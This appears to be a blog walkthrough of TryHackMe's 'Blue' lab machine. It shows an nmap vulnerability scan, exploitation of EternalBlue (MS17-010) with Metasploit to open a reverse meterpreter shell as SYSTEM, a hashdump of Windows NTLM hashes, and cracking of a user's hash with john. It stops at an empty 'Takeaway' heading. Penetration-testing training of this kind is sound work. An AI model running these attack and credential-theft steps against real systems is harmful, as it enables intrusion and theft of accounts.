My Computer

17 object(s)
 

Blue

Blue is the second machine in TryHackMe’s “Offensive pentesting” path.


Enumeration

We will start with nmap scan on the target:

nmap nmap -sV -vv --script vuln 10.10.221.153
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 06:00 EDT
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 06:00
Completed NSE at 06:01, 10.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 06:01
Completed NSE at 06:01, 0.00s elapsed
Failed to resolve "nmap".
Initiating Ping Scan at 06:01
Scanning 10.10.221.153 [2 ports]
Completed Ping Scan at 06:01, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:01
Completed Parallel DNS resolution of 1 host. at 06:01, 0.01s elapsed
Initiating Connect Scan at 06:01
Scanning 10.10.221.153 [1000 ports]
Discovered open port 445/tcp on 10.10.221.153
Discovered open port 3389/tcp on 10.10.221.153
Discovered open port 139/tcp on 10.10.221.153
Discovered open port 135/tcp on 10.10.221.153
Discovered open port 49153/tcp on 10.10.221.153
Discovered open port 49154/tcp on 10.10.221.153
Discovered open port 49158/tcp on 10.10.221.153
Discovered open port 49159/tcp on 10.10.221.153
Discovered open port 49152/tcp on 10.10.221.153
Completed Connect Scan at 06:01, 0.68s elapsed (1000 total ports)
Initiating Service scan at 06:01
Scanning 9 services on 10.10.221.153
Service scan Timing: About 55.56% done; ETC: 06:02 (0:00:44 remaining)
Completed Service scan at 06:02, 59.64s elapsed (9 services on 1 host)
NSE: Script scanning 10.10.221.153.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 06:02
NSE: [firewall-bypass 10.10.221.153] lacks privileges.
Completed NSE at 06:02, 30.07s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 06:02
NSE: [tls-ticketbleed 10.10.221.153:445] Not running due to lack of privileges.
NSE Timing: About 98.99% done; ETC: 06:03 (0:00:00 remaining)
NSE Timing: About 98.99% done; ETC: 06:03 (0:00:01 remaining)
Completed NSE at 06:04, 90.25s elapsed
Nmap scan report for 10.10.221.153
Host is up, received conn-refused (0.042s latency).
Scanned at 2020-10-08 06:01:08 EDT for 181s
Not shown: 991 closed ports
Reason: 991 conn-refused
PORT      STATE SERVICE            REASON  VERSION
135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp   open  microsoft-ds       syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp  open  ssl/ms-wbt-server? syn-ack
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_sslv2-drown:
49152/tcp open  msrpc              syn-ack Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open  msrpc              syn-ack Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open  msrpc              syn-ack Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49158/tcp open  msrpc              syn-ack Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49159/tcp open  msrpc              syn-ack Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 06:04
Completed NSE at 06:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 06:04
Completed NSE at 06:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.92 seconds

This machine is vulnerable to the smb-vuln-ms17-010 exploit, known in media as EternalBlue.
It’s can be done without Metasploit, of course, but it will be time consuming.
I’ll probably describe non-metasploit method next time.


Exploitation

Run Metasploit:

msfconsole

       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params set LHOST eth0

Setup the exploit:

msf5 > use windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.62.28
RHOSTS => 10.10.62.28
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => tun0

It should be fine as it is, but you also might need to change the LPORT too. Hit run:

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.11.19.53:1337
[*] 10.10.62.28:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.62.28:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.62.28:445       - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.62.28:445 - Connecting to target for exploitation.
[+] 10.10.62.28:445 - Connection established for exploitation.
[+] 10.10.62.28:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.62.28:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.62.28:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.62.28:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.62.28:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.62.28:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.62.28:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.62.28:445 - Sending all but last fragment of exploit packet
[*] 10.10.62.28:445 - Starting non-paged pool grooming
[+] 10.10.62.28:445 - Sending SMBv2 buffers
[+] 10.10.62.28:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.62.28:445 - Sending final SMBv2 buffers.
[*] 10.10.62.28:445 - Sending last fragment of exploit packet!
[*] 10.10.62.28:445 - Receiving response from exploit packet
[+] 10.10.62.28:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.62.28:445 - Sending egg to corrupted connection.
[*] 10.10.62.28:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.62.28
[*] Meterpreter session 1 opened (10.11.19.53:1337 -> 10.10.62.28:49170) at 2020-10-08 10:25:32 -0400
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
Computer        : JON-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows

A process of migrating the shell is well described in the official material, but I didn’t had any issue with the shell as it is.


Post Exploitation

As the shell is already running as NT AUTHORITY\SYSTEM we don’t need to do a PrivEsc. However, you might collect some useful data from compromised machine. Most of OSCP lab machines have something juicy to find if you become a root. Don’t skip the enumeration! To grab users hashes we can use hashdump command:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

We have a hash now! Let’s crack it. Save the hash into the file (jon.hash in my case) and crack it with john:

/usr/sbin/john -w=/usr/share/wordlists/rockyou.txt --format=NT ./jon.hash

Yay! We have Jon’s password now.

Capturing flags

Well, the exercise is explicitly asking you to submit flags, but don’t think of them as a CTF flags. A flag in a good CTF is located in the place where you can’t reach it without going an extra mile. There are three flags in this machine, and they are placed in quite sensitive places:

- C:/
- C:/Windows/System32/config/
- C:/Users/Jon/Documents

That’s make sense. System32/config/ is the place where SAM files located, Jon is the admin, so something helpful might be found in the Documents folder, etc.

Takeaway